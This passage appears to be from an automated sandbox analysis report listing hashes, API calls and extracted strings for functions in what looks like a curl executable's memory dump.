                                      • Instruction ID: ce1f3c5989a031f097f57b03cd7d5d6af047f203e18884b132287b005aa938da
                                      • Opcode Fuzzy Hash: 7e67a81e3a080e7d61ae5db57032cacf38bc9c7963bc5e3a0a4640a0d5f47535
                                      • Instruction Fuzzy Hash: 1C518F22A0CB86C2FB60AB11E850279E394FF4CB84F890571DA6D47790DF3CE4599798
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: _mbschr$_mbsnbcpymalloc
                                      • String ID:
                                      • API String ID: 2972395503-0
                                      • Opcode ID: b5697336e5453d5cea1e72d8a035da63a2a18224391c6ef73613a7a6344ec312
                                      • Instruction ID: 7435c7edaec186555942c02bd11e2d8b7525515f5a16259880bc6fecbc21c940
                                      • Opcode Fuzzy Hash: b5697336e5453d5cea1e72d8a035da63a2a18224391c6ef73613a7a6344ec312
                                      • Instruction Fuzzy Hash: 95318921A09B4685FB14EF62B804668F6A4EF4CBE0F890175CE2D0B7D4DF3CE0099798
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: strchr$isspace
                                      • String ID:
                                      • API String ID: 556700956-0
                                      • Opcode ID: e218c78b4ade7d3e38b077298e820fef08f04d7e18605d4b4e242df09a1c673f
                                      • Instruction ID: 5bdd4d0a88ae637a9a33619a6a82b161b09c5d611b2fcecb052122ea7e0f27b8
                                      • Opcode Fuzzy Hash: e218c78b4ade7d3e38b077298e820fef08f04d7e18605d4b4e242df09a1c673f
                                      • Instruction Fuzzy Hash: 8811C010A0C68345FB187B2366012B9D682DF59BE4F9C1270DE7E077C6ED2CE44A67A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: isdigit$strtol
                                      • String ID:
                                      • API String ID: 2442889181-0
                                      • Opcode ID: a67479961114326f8f07f49f5f6c507bd501bcddc971d7c6c9d343f05df2e53d
                                      • Instruction ID: 292540fa6f914e5bd214cacc3e812e6d631f643afb0a0dda470404e5c1840285
                                      • Opcode Fuzzy Hash: a67479961114326f8f07f49f5f6c507bd501bcddc971d7c6c9d343f05df2e53d
                                      • Instruction Fuzzy Hash: 5B21F971A0829685E7647F96D440278F7A0EF59B40FCC4035CAA9872D6CE3DE889F768
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: APPEND %s (\Seen) {%I64d}$Cannot APPEND with unknown input file size$Cannot APPEND without a mailbox.
                                      • API String ID: 0-1307079265
                                      • Opcode ID: 48b4bca2344cb32ef9d8dc8a52a7f623c44d8e344f128a619064515f7ca615b4
                                      • Instruction ID: fd9d75625dc983adb61471dc3ec58b346bf6dbf0f42599cd7a5e20911807d17b
                                      • Opcode Fuzzy Hash: 48b4bca2344cb32ef9d8dc8a52a7f623c44d8e344f128a619064515f7ca615b4
                                      • Instruction Fuzzy Hash: A2115161609B8681EB10FB15F4502A9E360EF48BC4F984032DA5D4B7D5DF3CD549E798
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: __swprintf_l_errno
                                      • String ID: %lx
                                      • API String ID: 1766030736-1448181948
                                      • Opcode ID: 89a99244bc9a4288bd00a8608990d59dd2fc616ea3720318d1d8e3a0d7ffb7ef
                                      • Instruction ID: 6a0f9edf879bce899f44508baf6f12ffcf85294afc569d816cd7402a296d30a3
                                      • Opcode Fuzzy Hash: 89a99244bc9a4288bd00a8608990d59dd2fc616ea3720318d1d8e3a0d7ffb7ef
                                      • Instruction Fuzzy Hash: 01515C32A0855641FB25AB25D4007BDE380FF8C765F944339D97E036C2DE3CE84EA2A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: SSL/TLS connection timeout$select/poll on SSL/TLS socket, errno: %d
                                      • API String ID: 0-3791222319
                                      • Opcode ID: f2873cb2e19afa8bbf216741164c1f1409d1d3743b49ef48fc39db06636968f5
                                      • Instruction ID: 63d05331c844c92208e19242cae3e08f551ab09a62c8b176d4d90d656a0db1fb
                                      • Opcode Fuzzy Hash: f2873cb2e19afa8bbf216741164c1f1409d1d3743b49ef48fc39db06636968f5
                                      • Instruction Fuzzy Hash: D441E822B0864282FB54EB12E9445BDE251BF88794FD44235CE2907BE5DF3DE449F368
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: _cwprintf_s_l
                                      • String ID: STLS$STLS not supported.
                                      • API String ID: 2941638530-4285220660
                                      • Opcode ID: 599e0e59caa209ba69c9f64e9ba40a5d93f129b01fea4d314cb495e678d3e004
                                      • Instruction ID: 48fbcd81f47996acd90a7423ef9d3154dac86cf6f966fcc32c53d2a2ca2cc67d
                                      • Opcode Fuzzy Hash: 599e0e59caa209ba69c9f64e9ba40a5d93f129b01fea4d314cb495e678d3e004
                                      • Instruction Fuzzy Hash: 2541F831E0C6824AF769EB10F64427DE691AF08794F944135CA7D4A1C5DF3DE449B3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast
                                      • String ID: FTP response aborted due to select/poll error: %d$FTP response timeout
                                      • API String ID: 1452528299-4057338436
                                      • Opcode ID: f7fb3e20a6b877405420897af26970cb6e743fc198844eb5bc6cb4d18cc6fb41
                                      • Instruction ID: ee55514ab65f20eff4f682e77ec598abd1ce82004929e2770ac5d0d2ce64d3f2
                                      • Opcode Fuzzy Hash: f7fb3e20a6b877405420897af26970cb6e743fc198844eb5bc6cb4d18cc6fb41
                                      • Instruction Fuzzy Hash: A831B061A0964681FB21BF22D5002B9E292BF5DB94F840131DE2C866D1DF3CE159F6E8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: _openfreemalloc
                                      • String ID: Couldn't open file %s
                                      • API String ID: 2329864384-447283422
                                      • Opcode ID: 314835c017acaab7b8f9e13be0dd3e2b1523af4054d113b6c0ca58d6ef6f5c07
                                      • Instruction ID: 3484ab44166df219b6edfe340ddc3e23a7bf81f3ebd4dc6e1e6580bda826386e
                                      • Opcode Fuzzy Hash: 314835c017acaab7b8f9e13be0dd3e2b1523af4054d113b6c0ca58d6ef6f5c07
                                      • Instruction Fuzzy Hash: 5731C252B0CA8285FB28EB25E8056B9E750AF09785F888031DE6D477D1EE3CE849A754
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: __swprintf_lmalloc
                                      • String ID: %%%02X
                                      • API String ID: 1671605834-3569721977
                                      • Opcode ID: 66fbbc3deb7bb64663e698fd2845cedef9887adf36b5293bcb2b65144f5427f8
                                      • Instruction ID: 401777a897ddeb0976a5ea4edfe4e06e21f8d7d1fc7d4490937fe4f1c7fb80c5
                                      • Opcode Fuzzy Hash: 66fbbc3deb7bb64663e698fd2845cedef9887adf36b5293bcb2b65144f5427f8
                                      • Instruction Fuzzy Hash: 1B31C762B09A8282FF54BB26944016CE690AF5CFA0FD84535CA7D077C4DE3CE80AD368
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID: Avoided giant realloc for header (max is %d)!$Failed to alloc memory for big header!
                                      • API String ID: 471065373-933084494
                                      • Opcode ID: 29aa0743b1533901b8be04917cafcd5fc311887c00c6ec4c15920c7bfddd4422
                                      • Instruction ID: 63247a0ecb169b0b6a3cc12461412948d6554dcdb4388a243f0696ed2759dc5e
                                      • Opcode Fuzzy Hash: 29aa0743b1533901b8be04917cafcd5fc311887c00c6ec4c15920c7bfddd4422
                                      • Instruction Fuzzy Hash: B9214D22B14E8186DB24EF26A840269F7A0FF49BC4F544431DE9E47FA5DE3CE446E358
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: isdigit
                                      • String ID:
                                      • API String ID: 2326231117-3916222277
                                      • Opcode ID: a08d7d0a692d410a3fe1977f30f025f9200914e2a6de8a65f04f0000d52b6331
                                      • Instruction ID: 7402cc9c46991f30ea39755863bcb021cb6d802fdbaa7b2f0a284eb319ab6a82
                                      • Opcode Fuzzy Hash: a08d7d0a692d410a3fe1977f30f025f9200914e2a6de8a65f04f0000d52b6331
                                      • Instruction Fuzzy Hash: 7A11B761B0AA8242FB216B15D540279E790DF18FA0F8C1172DAFF476C1DE6CE449B358
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: __swprintf_l_errno
                                      • String ID: %d.%d.%d.%d
                                      • API String ID: 1766030736-3491811756
                                      • Opcode ID: f8e917d89a7682ea05b1e0fb3cd2b8083d49edbfa1f21aaaac6e7f6d31628b11
                                      • Instruction ID: 14b84876e31746875012132ea2af932767d62fb56444ed7c7f2e9cd6b967b43d
                                      • Opcode Fuzzy Hash: f8e917d89a7682ea05b1e0fb3cd2b8083d49edbfa1f21aaaac6e7f6d31628b11
                                      • Instruction Fuzzy Hash: A211066260C7C586EB119B24E05026AFBA0EF5D7A4FA84235DBED037C6DB3DC009DB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: strtol
                                      • String ID: COLUMNS$O
                                      • API String ID: 76114499-2358961116
                                      • Opcode ID: 40ac6184323682b56fd3813741b15b0b49893e21d37cb6113d6c782d9689501f
                                      • Instruction ID: 62cb917653e8a7ba5a5a50ccb4201a746593a9e4bb7dd8c865746d112954628e
                                      • Opcode Fuzzy Hash: 40ac6184323682b56fd3813741b15b0b49893e21d37cb6113d6c782d9689501f
                                      • Instruction Fuzzy Hash: E511A521A0C74282EB25AB62E040279E6A4EF49B90F940235EB7D437D9DF3CD494D794
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: _cwprintf_s_lfree
                                      • String ID: QUIT
                                      • API String ID: 52267941-1967077921
                                      • Opcode ID: 477e556c1555472ac9210789b07bf8d2c7be1a3b26ddd63b704c1b514cce5734
                                      • Instruction ID: 430db9acf95760a26af2394a8ba9a8ada2e97b753c1aa14d1742b6d7f047440d
                                      • Opcode Fuzzy Hash: 477e556c1555472ac9210789b07bf8d2c7be1a3b26ddd63b704c1b514cce5734
                                      • Instruction Fuzzy Hash: 91115811A0C78292FB5CAB25E6903B9E391EF4C794F880131CA2D072C1DF2DE459A3A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: _cwprintf_s_lfree
                                      • String ID: QUIT
                                      • API String ID: 52267941-1967077921
                                      • Opcode ID: b4968bcee7de153baaf22fe344916283f4b6c6617ce7e2f3671dbcd0cb400f2e
                                      • Instruction ID: 44b579aa7626578adf5005e6c0527b121c8a02518e8593c518d03c3b59d8b0af
                                      • Opcode Fuzzy Hash: b4968bcee7de153baaf22fe344916283f4b6c6617ce7e2f3671dbcd0cb400f2e
                                      • Instruction Fuzzy Hash: 0D11A711A0874692FB24BB25E6807B9E391EF0C7C4F880031CE2D076D1DF2CE45AB7A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: getsockoptsetsockopt
                                      • String ID: @
                                      • API String ID: 194641219-2726393805
                                      • Opcode ID: df913511325163248f2d5e56634ea28ce7cd3ecc0f01dfc2952bbdfac12e1077
                                      • Instruction ID: ad8b094ab88cde4f7bc70525153e1156f330a5cff9db23f83450420f199a74c8
                                      • Opcode Fuzzy Hash: df913511325163248f2d5e56634ea28ce7cd3ecc0f01dfc2952bbdfac12e1077
                                      • Instruction Fuzzy Hash: 4711A37160CA8286F310EF20E400676F7A0FF88365F940134DA59476D4DBBDD48CDB98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: gethostnamestrchr
                                      • String ID: localhost
                                      • API String ID: 3518135066-2663516195
                                      • Opcode ID: 761d53a8bde59361d51bb5d8e84baf187234864e756bacb89559d610a43326dd
                                      • Instruction ID: a3618e4c2db6128edde586b1ba03284bf8348e7082146b50aaa0560a36dc3ee5
                                      • Opcode Fuzzy Hash: 761d53a8bde59361d51bb5d8e84baf187234864e756bacb89559d610a43326dd
                                      • Instruction Fuzzy Hash: D211086262CAC581FB21EB24E4403AAE790FF98708FC44031EB9D466C6DF3CD008C768
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7F8D4A1A2
                                      • InitializeCriticalSectionAndSpinCount.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7F8D49E28,?,?,00000001,00007FF7F8D49ACF,?,?,?,?,00007FF7F8D48847), ref: 00007FF7F8D4A1C8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: CountCriticalInitializeSectionSpintry_get_function
                                      • String ID: InitializeCriticalSectionEx
                                      • API String ID: 539475747-3084827643
                                      • Opcode ID: c57afb76dfdf9fa50dca74557498598f1101d04cb740137dcc6229c1b565a3e7
                                      • Instruction ID: b0d454b2cbc83ef428e38458b466d6f0a78bbd8f53acf52f99dc1c703dc3cbfe
                                      • Opcode Fuzzy Hash: c57afb76dfdf9fa50dca74557498598f1101d04cb740137dcc6229c1b565a3e7
                                      • Instruction Fuzzy Hash: 76F08111B0D74581E714AB53A441079E261AF8CBC0FDC4075EA6D03B89CE7CD4499B98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00000000,00007FF7F8D06C5B), ref: 00007FF7F8D077DB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: fputs
                                      • String ID: curl: $curl: try 'curl --help' for more information
                                      • API String ID: 1795875747-4128371185
                                      • Opcode ID: ed19029677f80869e38344be1b8508f314267fb552a729f9a7dcd06eb20116ad
                                      • Instruction ID: 5fbc65b0992071d9775c38a35c862d8d4968d6aa5d557f892d55a4e408657e07
                                      • Opcode Fuzzy Hash: ed19029677f80869e38344be1b8508f314267fb552a729f9a7dcd06eb20116ad
                                      • Instruction Fuzzy Hash: 7EF0BEA5A08B0680EA08AB06A8000A8E721EFADBD0B944132CD2D0B3A4DF3CD048D3A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
